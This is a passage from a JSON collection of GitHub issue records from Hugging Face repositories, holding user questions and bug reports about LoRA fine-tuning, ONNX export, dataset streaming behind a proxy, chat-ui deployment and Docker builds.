Given: 603 `inputs` tokens and 1024 `max_new_tokens`\r\n\r\nWhen deployed, the UI works fine for like 2 or 3 prompts, then for every prompt we try we get a red line on top with a pop-up showing this message. Please, how can we remove this limitation in the code?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/327", "state": "open", "labels": [ "question", "back" ], "created_at": "2023-06-28T18:09:19Z", "updated_at": "2023-09-18T14:03:59Z", "user": "Billyroot" }, { "repo": "huggingface/diffusers", "number": 3890, "title": "How to apply the schedulers in diffusers to original SD", "body": "Hi! Thanks for this great work! Diffusers helps me a lot in many aspects!\r\n\r\nBecause of my recent work, I would like to know whether the schedulers in diffusers can be directly used in the original SD. If yes, what should I do? \r\n\r\nAny response will be greatly appreciated! Again, thank you all for this convenient framework!", "url": "https://github.com/huggingface/diffusers/issues/3890", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-28T11:02:41Z", "updated_at": "2023-08-05T15:04:00Z", "user": "volcverse" }, { "repo": "huggingface/dataset-viewer", "number": 1446, "title": "Add fields `viewer` and `preview` to /is-valid", "body": "For coherence with /valid, we should add the `viewer` and `preview` fields to /is-valid.\r\n\r\nWe should also consider deprecating the current `valid` field (as in https://github.com/huggingface/datasets-server/issues/1445). Note that it's in use in https://github.com/search?q=org%3Ahuggingface+datasets-server.huggingface.co+repo%3Ahuggingface%2Fnotebooks&type=code and also in @lewtun's evaluator, if I remember correctly.", "url": "https://github.com/huggingface/dataset-viewer/issues/1446", "state": "closed", "labels": [ "question", "api" ], "created_at": "2023-06-28T09:19:56Z", "updated_at": "2023-06-29T14:13:16Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 1445, "title": "Remove `.valid` from `/valid` endpoint?", "body": "We recently added two fields to `/valid`:\r\n- `viewer`: all the datasets that have a valid dataset viewer\r\n- `preview`: all the datasets that don't have a valid dataset viewer, but have a dataset preview\r\n\r\nAnd the Hub does not use the original field `valid` anymore. We still fill it with the union of both sets.\r\n\r\nShould we remove it, as it doubles the size of the response and increases the response time, with no benefit?
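\r\n\r\nConcretely, the slimmed-down response would then carry only the two documented fields, something like (sketch):\r\n\r\n```python\r\n{\r\n    \"viewer\": [\"dataset-a\", \"dataset-b\"],  # datasets with a working viewer\r\n    \"preview\": [\"dataset-c\"]  # datasets with only a preview\r\n}\r\n```\r\n\r\n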
cc @huggingface/datasets-server \r\n\r\nNote that it's used in the notebooks (https://github.com/search?q=org%3Ahuggingface+datasets-server.huggingface.co+repo%3Ahuggingface%2Fnotebooks&type=code), for example, so it is a breaking change.\r\n\r\nI would vote in favor of removing it, and updating the notebooks (and the docs obviously).", "url": "https://github.com/huggingface/dataset-viewer/issues/1445", "state": "closed", "labels": [ "question", "api" ], "created_at": "2023-06-28T09:17:13Z", "updated_at": "2023-07-26T15:47:35Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 3882, "title": "How to use models like chilloutmix to do inpainting task?", "body": "I tried as https://huggingface.co/docs/diffusers/api/diffusion_pipeline mentioned:\r\n`text2img = StableDiffusionPipeline.from_pretrained(\"/data/cx/ysp/aigc-smart-painter/models/chilloutmix_NiPrunedFp32Fix\")\r\ninpaint = StableDiffusionInpaintPipeline(**text2img.components)\r\nseger = RawSeger()\r\nREST_API_URL = 'http://localhost:9900/sd/inpaint'\r\npainter = GridPainter()\r\nimg_path = \"/data/cx/ysp/aigc-smart-painter/assets/cloth1.jpg\"\r\nimage = Image.open(img_path)\r\nbox = [220, 20, 500, 320]\r\nnew_image = draw_box(np.array(image), cords=box, color=(255, 0, 0), thickness=2)\r\nshow_image(new_image)\r\nmask = seger.prompt_with_box(image, box=box, reverse=False)\r\nmask = Image.fromarray(mask)\r\nshow_image(mask)\r\nend = time.time()\r\nprompt = \"best quality,symmetry realistic,real life,photography,masterpiece,8K,HDR,highres,1 gril, looking at viewer\"\r\nimages = inpaint(prompt=prompt, image=image, mask_image=mask, num_images_per_prompt=1,\r\n num_inference_steps=50, guidance_scale=7.5,)\r\n\r\npainter.image_grid(images, rows=1, cols=len(images) // 1)\r\npainter.image_show()\r\nprint(\"finished\")`\r\n\r\nI got this error:\r\nexpects 4 but received `num_channels_latents`: 4 + `num_channels_mask`: 1 + \r\n`num_channels_masked_image`: 4 = 9. 
Please verify the config of `pipeline.unet` \r\nor your `mask_image` or `image` input.\r\n\r\nProcess finished with exit code 1\r\n\r\nHow can I convert model like chilloutmix to do inpainting task?\r\nThank you !\r\n", "url": "https://github.com/huggingface/diffusers/issues/3882", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-27T15:25:31Z", "updated_at": "2023-08-05T15:04:07Z", "user": "AdamMayor2018" }, { "repo": "huggingface/diffusers", "number": 3881, "title": "How many images and how many epochs are required to fine tune LORA for stable diffusion on custom image dataset", "body": "I am trying to finetune LORA on a movie dataset , but I am using custom dataset which has 3-4 movie characters , instead of using the actual names of the actor we are using in movie name of the characters , how big the dataset would be required in terms of total number of images, and number of images per character and how many epochs would be required to fine tune this LORA model .\r\nPS: I have already tried fine tuning with 200 images of a single character for 100,250 and 500 Epochs but the results are very bad , can anyone please provide some suggestion @patrickvonplaten @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/3881", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-27T11:05:53Z", "updated_at": "2023-08-04T15:03:17Z", "user": "atharmzaalo2023" }, { "repo": "huggingface/peft", "number": 636, "title": "How to save full model weights and not just the adapters ?", "body": "### System Info\n\npeft==0.4.0.dev0\r\n\r\nI'm not sure if this should be a bug report, so sorry if this is not convenient. \r\nAccording to the `save_pretrained`method docstring, this saves the adapter model only and not the full model weights, is there an option where I can save the full model weights ? The use case is that we want to upload the full model to hf to be able to activate the inference API, however now we only save adapter weights \n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nsave_pretrained saves only adapters, maybe also add the option to save the full model \n\n### Expected behavior\n\nsave_pretrained saves only adapters, maybe also add the option to save the full model ", "url": "https://github.com/huggingface/peft/issues/636", "state": "closed", "labels": [], "created_at": "2023-06-26T15:30:48Z", "updated_at": "2025-03-13T11:52:23Z", "user": "azayz" }, { "repo": "huggingface/peft", "number": 631, "title": "How to train multiple LoRAs at once?", "body": "Hi! I would like to train multiple LoRAs at once (for some reason). Although `requires_grad` is True for all LoRA weight matrices, only the first LoRA weight matrix will calculate the gradient, and the others will not calculate the gradient - and will not be updated. How can I train them in one forward process?\r\n\r\n1. 
I initialize multiple LoRAs using the `add_adapter()` method\r\n```python\r\nbert_path = \"prajjwal1/bert-tiny\"\r\nrank = 8\r\nLoRA_amount = 6\r\n\r\nmodel = CustomBert.from_pretrained(bert_path)\r\npeft_config = LoraConfig(\r\n inference_mode=False, \r\n r=rank, \r\n lora_alpha=32, \r\n lora_dropout=0.1\r\n)\r\nmodel = PeftModel(model, peft_config, adapter_name=\"0\")\r\nfor LoRA_index in range(1, LoRA_amount):\r\n model.add_adapter(str(LoRA_index), peft_config)\r\n```\r\n2. This is the printed model architecture\r\n```\r\ntestModel(\r\n (model): PeftModel(\r\n (base_model): LoraModel(\r\n (model): CustomBert(\r\n (bert): BertModel(\r\n (embeddings): BertEmbeddings(\r\n (word_embeddings): Embedding(30522, 128, padding_idx=0)\r\n (position_embeddings): Embedding(512, 128)\r\n (token_type_embeddings): Embedding(2, 128)\r\n (LayerNorm): LayerNorm((128,), eps=1e-12, elementwise_affine=True)\r\n (dropout): Dropout(p=0.1, inplace=False)\r\n )\r\n (encoder): BertEncoder(\r\n (layer): ModuleList(\r\n (0): BertLayer(\r\n (attention): BertAttention(\r\n (self): BertSelfAttention(\r\n (query): Linear(\r\n in_features=128, out_features=128, bias=True\r\n (lora_dropout): ModuleDict(\r\n (0): Dropout(p=0.1, inplace=False)\r\n (1): Dropout(p=0.1, inplace=False)\r\n (2): Dropout(p=0.1, inplace=False)\r\n (3): Dropout(p=0.1, inplace=False)\r\n (4): Dropout(p=0.1, inplace=False)\r\n (5): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (0): Linear(in_features=128, out_features=16, bias=False)\r\n (1): Linear(in_features=128, out_features=16, bias=False)\r\n (2): Linear(in_features=128, out_features=16, bias=False)\r\n (3): Linear(in_features=128, out_features=16, bias=False)\r\n (4): Linear(in_features=128, out_features=16, bias=False)\r\n (5): Linear(in_features=128, out_features=16, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (0): Linear(in_features=16, out_features=128, bias=False)\r\n (1): Linear(in_features=16, out_features=128, bias=False)\r\n (2): Linear(in_features=16, out_features=128, bias=False)\r\n (3): Linear(in_features=16, out_features=128, bias=False)\r\n (4): Linear(in_features=16, out_features=128, bias=False)\r\n (5): Linear(in_features=16, out_features=128, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n )\r\n (key): Linear(in_features=128, out_features=128, bias=True)\r\n (value): Linear(\r\n in_features=128, out_features=128, bias=True\r\n (lora_dropout): ModuleDict(\r\n (0): Dropout(p=0.1, inplace=False)\r\n (1): Dropout(p=0.1, inplace=False)\r\n (2): Dropout(p=0.1, inplace=False)\r\n (3): Dropout(p=0.1, inplace=False)\r\n (4): Dropout(p=0.1, inplace=False)\r\n (5): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (0): Linear(in_features=128, out_features=16, bias=False)\r\n (1): Linear(in_features=128, out_features=16, bias=False)\r\n (2): Linear(in_features=128, out_features=16, bias=False)\r\n (3): Linear(in_features=128, out_features=16, bias=False)\r\n (4): Linear(in_features=128, out_features=16, bias=False)\r\n (5): Linear(in_features=128, out_features=16, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (0): Linear(in_features=16, out_features=128, bias=False)\r\n (1): Linear(in_features=16, out_features=128, bias=False)\r\n (2): Linear(in_features=16, out_features=128, bias=False)\r\n (3): Linear(in_features=16, out_features=128, bias=False)\r\n (4): Linear(in_features=16, out_features=128, bias=False)\r\n (5", "url": "https://github.com/huggingface/peft/issues/631", "state": 
"closed", "labels": [ "enhancement" ], "created_at": "2023-06-26T09:30:16Z", "updated_at": "2023-08-18T13:41:32Z", "user": "meteorlin" }, { "repo": "huggingface/optimum", "number": 1135, "title": "Donut document parsing export to onnx does not work.", "body": "### System Info\n\n```shell\noptimum==1.8.8\r\npython==3.11.3\r\nsystem linux\n```\n\n\n### Who can help?\n\nThe donut export does not work with the following commands, does anybody know how to get this running or know about the status.\r\n\r\n```\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/\r\n...\r\n...\r\n...\r\nException: The post-processing of the ONNX export failed. The export can still be performed by passing the option --no-post-process. Detailed error: Unable to merge decoders. Detailed error: Expected \r\na dynamic shape for the axis zero of onnx::Reshape_1045, found a static shape: 2\r\n```\r\n````\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/ --no-post-process\r\n...\r\n...\r\n...\r\n- last_hidden_state: max diff = 0.0012216567993164062\r\nValidation 1 for the model donut_cord2_onnx/decoder_model.onnx raised: The exported ONNX model does not have the exact same outputs as what is provided in VisionEncoderDecoderOnnxConfig. Difference: onnx::Reshape_1263, onnx::Reshape_1359, onnx::Reshape_1364, onnx::Reshape_1045, onnx::Reshape_1146, onnx::Reshape_1258, onnx::Reshape_1151, onnx::Reshape_1050\r\nonnxruntime.capi.onnxruntime_pybind11_state.InvalidArgument: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Invalid Feed Input Name:encoder_hidden_states\r\nAn error occured during validation, but the model was saved nonetheless at donut_cord2_onnx. Detailed error: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Invalid Feed Input Name:encoder_hidden_states.\r\n```\r\n\r\nChanging the task name to image-to-text instead of image-to-text-with-past does seem to run. However, I assume that this task is set specifically. Although, for me it is unclear why it is set to that particular task.\r\n\r\n```\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/ --no-post-process --task image-to-text\r\nValidating ONNX model donut_cord2_onnx/encoder_model.onnx...\r\n -[\u2713] ONNX model output names match reference model (last_hidden_state)\r\n - Validating ONNX Model output \"last_hidden_state\":\r\n -[\u2713] (2, 1200, 1024) matches (2, 1200, 1024)\r\n -[x] values not close enough, max diff: 0.00121307373046875 (atol: 0.001)\r\nValidating ONNX model donut_cord2_onnx/decoder_model.onnx...\r\nValidation 0 for the model donut_cord2_onnx/encoder_model.onnx raised: The maximum absolute difference between the output of the reference model and the ONNX exported model is not within the set tolerance 0.001:\r\n- last_hidden_state: max diff = 0.00121307373046875\r\nThe ONNX export succeeded with the warning: The exported ONNX model does not have the exact same outputs as what is provided in VisionEncoderDecoderOnnxConfig. 
Difference: onnx::Reshape_1359, onnx::Reshape_1258, onnx::Reshape_1146, onnx::Reshape_1151, onnx::Reshape_1050, onnx::Reshape_1045, onnx::Reshape_1364, onnx::Reshape_1263.\r\n The exported model was saved at: donut_cord2_onnx\r\n```\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/\r\n\r\n\n\n### Expected behavior\n\nexport to run correctly and validation report.", "url": "https://github.com/huggingface/optimum/issues/1135", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-26T08:57:01Z", "updated_at": "2023-06-26T10:17:32Z", "comments": 3, "user": "casperthuis" }, { "repo": "huggingface/peft", "number": 630, "title": "How to switch to P-Tuning v2", "body": "We can find the `P-Tuning v2` in \r\nhttps://github.com/huggingface/peft/blob/8af8dbd2ec9b4b8f664541e9625f898db7c7c78f/README.md?plain=1#L29\r\nBut how can I switch to `P-Tuning v2`?", "url": "https://github.com/huggingface/peft/issues/630", "state": "closed", "labels": [ "solved" ], "created_at": "2023-06-26T08:52:42Z", "updated_at": "2023-08-04T15:03:30Z", "user": "jiahuanluo" }, { "repo": "huggingface/optimum", "number": 1134, "title": "ValueError: ..set the option `trust_remote_code=True` to remove this error", "body": "### System Info\n\n```shell\n- `optimum` version: 1.8.8\r\n- `transformers` version: 4.30.2\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.11.3\r\n- Huggingface_hub version: 0.15.1\r\n- PyTorch version (GPU?): 2.0.1+cpu (cuda availabe: False)\r\n- Tensorflow version (GPU?): not installed (cuda availabe: NA)\n```\n\n\n### Who can help?\n\nHello,\r\n\r\nI am running the optimum cli command \r\n\r\n`optimum-cli export onnx --model mosaicml/mpt-7b-chat --task text-generation mpt-7b-chat\\`\r\n\r\nwhen I am getting this error:\r\n\r\n```\r\nFile \"C:\\Users\\dutta\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\transformers\\dynamic_module_utils.py\", line 553, in resolve_trust_remote_code\r\n raise ValueError(\r\nValueError: Loading mosaicml/mpt-7b-chat requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error.\r\n```\r\n\r\nHow to deal with this error? 
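Is the intended fix simply to pass the flag through the CLI, e.g. `optimum-cli export onnx --model mosaicml/mpt-7b-chat --task text-generation --trust-remote-code mpt-7b-chat\`? I am guessing at a `--trust-remote-code` option here; I have not confirmed that the exporter forwards it.\r\n\r\n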
@michaelbenayoun\r\n\r\nThanks\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the same command replacing the output directory name to a name of your choice\n\n### Expected behavior\n\nI expect the command to run without error and product the ONNX model and other files in the output directory", "url": "https://github.com/huggingface/optimum/issues/1134", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-24T12:47:35Z", "updated_at": "2023-07-06T16:38:30Z", "comments": 5, "user": "diptenduLF" }, { "repo": "huggingface/chat-ui", "number": 322, "title": "Chat using WizardCoder", "body": "Hello,\r\nCan you please post an example of .env.local for:\r\nWizardLM/WizardCoder-15B-V1.0", "url": "https://github.com/huggingface/chat-ui/issues/322", "state": "open", "labels": [], "created_at": "2023-06-23T18:44:07Z", "updated_at": "2023-08-14T20:52:39Z", "comments": 2, "user": "vitalyshalumov" }, { "repo": "huggingface/chat-ui", "number": 321, "title": "Chat-UI not loading Tailwind colors. ", "body": "**Problem**\r\n\r\nWhen specifying `PUBLIC_APP_COLOR` in either the `.env` or the `.env.local` file, the chat-UI color does not change regardless of which color is used. Even when `PUBLIC_APP_COLOR=blue` as set in this repository, the chat-UI color does not match with TailwindCSS's blue color palette: \r\n\r\n**TailwindCSS blue color palette:**\r\n\"blue\"\r\n\r\n**Chat-UI color palette:**\r\n\"chat\"\r\n\r\n**Observation**\r\nUpon investigating the code, I noticed that the switchTheme.ts file contains the following code:\r\n```\r\nexport function switchTheme() {\r\n\tconst { classList } = document.querySelector(\"html\") as HTMLElement;\r\n\tif (classList.contains(\"dark\")) {\r\n\t\tclassList.remove(\"dark\");\r\n\t\tlocalStorage.theme = \"light\";\r\n\t} else {\r\n\t\tclassList.add(\"dark\");\r\n\t\tlocalStorage.theme = \"dark\";\r\n\t}\r\n}\r\n```\r\n\r\nI think that instead of loading the Tailwind colors specified in either `.env` or `.env.local`, the chat-UI is actually using these `\"light\"` and `\"dark\"` themes. I couldn't find where these themes are specified in the repositories or if they can be changed at all. \r\n\r\n**Requested Solution:**\r\nI want to load the Tailwind colors by setting `PUBLIC_APP_COLOR` in `.env` and/or `.env.local`. However, if it turns out that the chat-UI laods colors based on the `\"light\"` and `\"dark\"`, adjusting these themes could also be a viable solution. Thank you in advance for your assistance. ", "url": "https://github.com/huggingface/chat-ui/issues/321", "state": "closed", "labels": [ "question", "front" ], "created_at": "2023-06-23T15:54:43Z", "updated_at": "2023-09-18T13:12:15Z", "user": "ckanaar" }, { "repo": "huggingface/peft", "number": 622, "title": "LoRA results in 4-6% lower performance compared to full fine-tuning", "body": "I am working on fine-tuning LLMs (6B to 40B parameters) using the LoRA framework on an instruction tuning dataset comprising of instructions corresponding to ~20 tasks (a mix of factual as well as open-ended tasks). The input to the model consists of a conversation snippet between two individuals along with a task-specific prompt. The results I am observing do not align with the performance improvements reported in the [paper](https://arxiv.org/pdf/2106.09685.pdf). 
Specifically, the paper reports that fine-tuning using LoRA generally results in performance at par with or better than full fine-tuning of the model, however, throughout our experiments I observe a performance lower than full fine-tuning by an absolute margin of ~4-6% in terms of RougeL score. \r\n\r\nSharing some of the training details below:\r\n\r\n**[Framework versions]**\r\nPython: 3.8\r\nPyTorch: 1.13.1 \r\nTransformers: 4.27.4\r\nPEFT: 0.3.0\r\n\r\n**[Infrastructure]**\r\n8 X A100 40 GB GPUs \r\n\r\n**[Hyper-parameter Range]**\r\nLearning rate: 5e-5 to 3e-3\r\nLearning rate scheduler: [Constant, Linear]\r\nEpochs: [1, 2]\r\nBatch size: [2, 4, 8]\r\nWeight decay: 0.0\r\nPrecision: bf16\r\n\r\nSpecifically, I tried fine-tuning of `google/flan-t5-xxl` model in following two scenarios:\r\n\r\n- **Scenario 1**\r\nFull fine-tuning with constant `learning rate = 5e-5`, `batch size = 8`, `epochs = 1`\r\n\r\n- **Scenario 2**\r\nFine-tuning using LoRA with constant `learning rate = 1e-3`, `batch size = 8`, `epochs = 1` and LoraConfig as follows:\r\n`LoraConfig(r=8, lora_alpha=16, lora_dropout=0.05, bias='none', task_type=\"SEQ_2_SEQ_LM\")`\r\n\r\n**Observation:** Scenario 2 resulted in 4% lower RougeL as compared to scenario 1. I have also tried tuning the hyper-parameters in Scenario 2 as per the range specified above, however, the best I could get is to a gap of ~4% RougeL.\r\n\r\nThank you very much for your time and consideration. Looking forward to any relevant insights here.", "url": "https://github.com/huggingface/peft/issues/622", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-23T10:50:24Z", "updated_at": "2023-07-24T12:12:18Z", "user": "digvijayingle016" }, { "repo": "huggingface/setfit", "number": 389, "title": "gradient_accumulation", "body": "Is there a way in setFitTrainer to change the gradient_accumulation like you can do in the regular Trainer class in TrainingArguments? Also just in general I am looking for tips to make training faster.", "url": "https://github.com/huggingface/setfit/issues/389", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-22T21:18:37Z", "updated_at": "2023-11-11T05:32:34Z", "user": "zackduitz" }, { "repo": "huggingface/datasets", "number": 5982, "title": "404 on Datasets Documentation Page", "body": "### Describe the bug\n\nGetting a 404 from the Hugging Face Datasets docs page:\r\nhttps://huggingface.co/docs/datasets/index\r\n\n\n### Steps to reproduce the bug\n\n1. Go to URL https://huggingface.co/docs/datasets/index\r\n2. Notice 404 not found\n\n### Expected behavior\n\nURL should either show docs or redirect to new location\n\n### Environment info\n\nhugginface.co", "url": "https://github.com/huggingface/datasets/issues/5982", "state": "closed", "labels": [], "created_at": "2023-06-22T20:14:57Z", "updated_at": "2023-06-26T15:45:03Z", "comments": 2, "user": "kmulka-bloomberg" }, { "repo": "huggingface/chat-ui", "number": 317, "title": "Issues when trying to deploy on cPanel (shared hosting)", "body": "Hello there, \r\n\r\nIs there something special to do to be able to deploy chat-ui on a shared hosting using cPanel? \r\n\r\nI tried using the Node.JS Apps Manager as follows\r\n![cpanel](https://github.com/huggingface/chat-ui/assets/109650634/fac1abfd-000a-4dde-bf38-54427b12889c)\r\n\r\nBut even when switching my entry point to server/index.js, it doesn't work. \r\n\r\nI also tried to NPM install using the manager, but then it doesn't seem to be able to use vite, even when forcing any `npm install vite`... 
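For reference, what I assumed would work (a guess based on the repo's Dockerfile, since chat-ui appears to build with SvelteKit's node adapter): run `npm ci && npm run build` locally or in CI, upload the resulting `build/` directory together with `node_modules` and `package.json`, and point the cPanel app's startup file at `build/index.js` rather than `server/index.js`.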
\r\n\r\nSo, if you could help me out on this, it would be highly appreciated! \r\n\r\nIn advance, thanks a lot. \r\n\r\nRegards, \r\n\r\nGollum\u00e9o", "url": "https://github.com/huggingface/chat-ui/issues/317", "state": "closed", "labels": [ "support" ], "created_at": "2023-06-22T17:32:00Z", "updated_at": "2023-09-18T13:12:53Z", "comments": 1, "user": "gollumeo" }, { "repo": "huggingface/transformers.js", "number": 161, "title": "[Question] whisper vs. ort-wasm-simd-threaded.wasm", "body": "While looking into https://cdn.jsdelivr.net/npm/@xenova/transformers@2.2.0/dist/transformers.js I can see a reference to **ort-wasm-simd-threaded.wasm**; however, that one never seems to be loaded for whisper/automatic-speech-recognition ( https://huggingface.co/spaces/Xenova/whisper-web ), while it always uses **ort-wasm-simd.wasm**. I wonder if there is a way to enable or enforce threaded wasm and so improve transcription speed?", "url": "https://github.com/huggingface/transformers.js/issues/161", "state": "open", "labels": [ "question" ], "created_at": "2023-06-22T06:41:31Z", "updated_at": "2023-08-15T16:36:01Z", "user": "jozefchutka" }, { "repo": "huggingface/datasets", "number": 5975, "title": "Streaming Dataset behind Proxy - FileNotFoundError", "body": "### Describe the bug\r\n\r\nWhen trying to stream a dataset I get the following error after a few minutes of waiting.\r\n\r\n```\r\nFileNotFoundError: https://huggingface.co/datasets/facebook/voxpopuli/resolve/main/data/n_files.json\r\nIf the repo is private or gated, make sure to log in with `huggingface-cli login`.\r\n```\r\n\r\nI have already set the proxy environment variables. Downloading a dataset without streaming works as expected.\r\nStill, I suspect that this is connected to being behind a proxy.\r\n\r\nIs there a way to set the proxy for streaming datasets? Possibly a keyword argument that gets passed to fsspec?\r\n\r\n### Steps to reproduce the bug\r\n\r\nThis is the code I use.\r\n\r\n```\r\nimport os\r\nos.environ['http_proxy'] = \"http://example.com:xxxx\" \r\nos.environ['https_proxy'] = \"http://example.com:xxxx\" \r\n\r\n\r\nfrom datasets import load_dataset\r\n\r\nds = load_dataset(\"facebook/voxpopuli\", name=\"de\", streaming=True)\r\n```\r\n\r\n### Expected behavior\r\n\r\nI would expect the streaming functionality to use the set proxy settings.\r\n\r\n### Environment info\r\n\r\n\r\n- `datasets` version: 2.13.0\r\n- Platform: Linux-5.15.0-73-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.11\r\n- Huggingface_hub version: 0.15.1\r\n- PyArrow version: 11.0.0\r\n- Pandas version: 2.0.2\r\n", "url": "https://github.com/huggingface/datasets/issues/5975", "state": "closed", "labels": [], "created_at": "2023-06-21T19:10:02Z", "updated_at": "2023-06-30T05:55:39Z", "comments": 9, "user": "Veluchs" }, { "repo": "huggingface/transformers.js", "number": 158, "title": "[Question] How do I use this library with ts-node?", "body": "I have a non-Web/browser-based project that uses TypeScript with ts-node. \r\n\r\nThe \"pipeline\" function attempts to use the JavaScript Fetch API, which is not included with NodeJS, and the code therefore fails with an error: \"fetch is not defined.\"\r\n\r\nThe \"node-fetch\" package doesn't seem to provide a compatible API.
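\r\n\r\nThe closest I have gotten to a workaround is running on Node.js 18+, where `fetch`, `Headers`, `Request` and `Response` exist as globals, so the library's calls resolve without a polyfill; on older Node versions, attaching a WHATWG-compatible implementation (e.g. from the `undici` package) to `globalThis` before importing the library might work, though I have not verified that. Is there a supported path for earlier Node versions?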
\r\n", "url": "https://github.com/huggingface/transformers.js/issues/158", "state": "open", "labels": [ "question" ], "created_at": "2023-06-21T17:42:11Z", "updated_at": "2023-08-17T13:20:51Z", "user": "moonman239" }, { "repo": "huggingface/chat-ui", "number": 314, "title": "500 Internal Error", "body": "![image](https://github.com/huggingface/chat-ui/assets/81065703/33c28e7b-584b-48e3-a64c-b4d5271a325f)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/314", "state": "closed", "labels": [ "question", "support" ], "created_at": "2023-06-21T08:58:52Z", "updated_at": "2023-06-22T13:13:57Z", "user": "kasinadhsarma" }, { "repo": "huggingface/datasets", "number": 5971, "title": "Docs: make \"repository structure\" easier to find", "body": "The page https://huggingface.co/docs/datasets/repository_structure explains how to create a simple repository structure without a dataset script.\r\nIt's the simplest way to create a dataset and should be easier to find, particularly on the docs' first pages.", "url": "https://github.com/huggingface/datasets/issues/5971", "state": "open", "labels": [ "documentation" ], "created_at": "2023-06-21T08:26:44Z", "updated_at": "2023-07-05T06:51:38Z", "comments": 5, "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 313, "title": "MongoDB", "body": "I have a free teir MongoDB acount but not sure how to get url plz help", "url": "https://github.com/huggingface/chat-ui/issues/313", "state": "closed", "labels": [ "support" ], "created_at": "2023-06-21T07:47:18Z", "updated_at": "2023-06-23T08:34:42Z", "comments": 5, "user": "Toaster496" }, { "repo": "huggingface/peft", "number": 607, "title": "trainer with multi-gpu", "body": "I want to use trainer.predict to predict datasets by multi-gpu, but actually I only use single one gpu\r\nwhen I print Seq2SeqTrainingArguments , I get \r\n![image](https://github.com/huggingface/peft/assets/2166948/c34b25a7-670a-411a-ab85-23910b98cb92)\r\nIt shows 8 gpu\r\n\r\nI check my code, when I load model, I find something strange\r\nbase_model.device: cpu\r\npeftModel is as follows:\r\n![image](https://github.com/huggingface/peft/assets/2166948/cb30b422-7519-4a76-ba32-fa25afc9d720)\r\nit print cuda\r\n\r\nhow can i fix?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/607", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-20T08:58:37Z", "updated_at": "2023-07-28T15:03:31Z", "user": "hrdxwandg" }, { "repo": "huggingface/chat-ui", "number": 311, "title": "Unable to build with Docker ", "body": "Hey, \r\nI'm trying to create a docker container with Chat-Ui but i'm facing a wall. \r\nI cloned this repo in a folder on a server and modified the `.env` file, thinking that it would be easy to deploy a docker container out of it but I could not be more wrong ! \r\nAfter trying to build my container with `docker build -t chat-ui .` I went to the same problem as [here](https://github.com/huggingface/chat-ui/issues/301). \r\n\r\nI tried to build the docker container before and after running `npm install` but I went through the exact same problem, which is that it cannot run in the Dockerfile :\r\n```\r\nRUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env.local \\ \r\n npm run build\r\n```\r\n\r\nAt first I thought it was an issue with docker not being able to run` npm install` so I added, at the begining of my dockerfile `CMD npm install` and went also throughout the same issue, I'm guessing it has something to do with the dockerfile itself. 
\r\n\r\n\r\nTo reproduce my error, here are the steps :\r\n\r\n1. `git clone https://github.com/huggingface/chat-ui.git`\r\n2. `cp .env .env.local `\r\n3. modify my .env.local with my variables\r\n4. `docker build -t chat-ui .`\r\n\r\nHere is the error I'm getting when I launch the docker build command :\r\n\r\n```\r\ndocker build -t chat-ui .\r\n[+] Building 4.3s (16/17) \r\n => [internal] load .dockerignore 0.0s\r\n => => transferring context: 122B 0.0s\r\n => [internal] load build definition from Dockerfile 0.0s\r\n => => transferring dockerfile: 954B 0.0s\r\n => [internal] load metadata for docker.io/library/node:19 0.6s\r\n => [internal] load metadata for docker.io/library/node:19-slim 0.6s\r\n => [builder-production 1/4] FROM docker.io/library/node:19@sha256:92f06f 0.0s\r\n => [internal] load build context 0.0s\r\n => => transferring context: 10.45kB 0.0s\r\n => [stage-2 1/5] FROM docker.io/library/node:19-slim@sha256:f58f1fcf5c9f 0.0s\r\n => CACHED [builder-production 2/4] WORKDIR /app 0.0s\r\n => CACHED [builder-production 3/4] COPY --link --chown=1000 package-lock 0.0s\r\n => CACHED [builder-production 4/4] RUN --mount=type=cache,target=/app/.n 0.0s\r\n => CACHED [builder 1/3] RUN --mount=type=cache,target=/app/.npm 0.0s\r\n => CACHED [builder 2/3] COPY --link --chown=1000 . . 0.0s\r\n => CACHED [stage-2 2/5] RUN npm install -g pm2 0.0s\r\n => 